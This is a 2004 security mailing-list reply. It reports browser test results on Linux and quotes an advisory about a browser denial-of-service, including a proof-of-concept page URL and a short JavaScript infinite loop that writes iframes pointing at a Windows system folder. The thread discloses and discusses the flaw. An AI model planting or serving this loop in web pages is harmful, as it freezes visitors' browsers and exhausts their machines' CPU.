Tested this in Mozilla 1.7.2 and Epiphany 1.2.6 in Linux (kernel 2.6.8, Gentoo, Gnome 2.6.2). Each browser comes up with a warning about running the script. The user can chose to run it or not. Either way, a dialog box reloads over and over until the main window is forced closed with xkill. Dan Pixley On Sat, 2004-08-21 at 20:41, exploits@xxxxxxxx wrote: > Description > ======== > > Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu > Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over > > POC > === > URL : http://www.su1d.net/iframe2.html > > <scr1pt language="JavaScript"> > while(true) > { > document.write("<iframe src=\"C:\Windows\system32\"></iframe>"); > } > </scr1pt> > Discovered by MeFakon from the su1d exploit development team >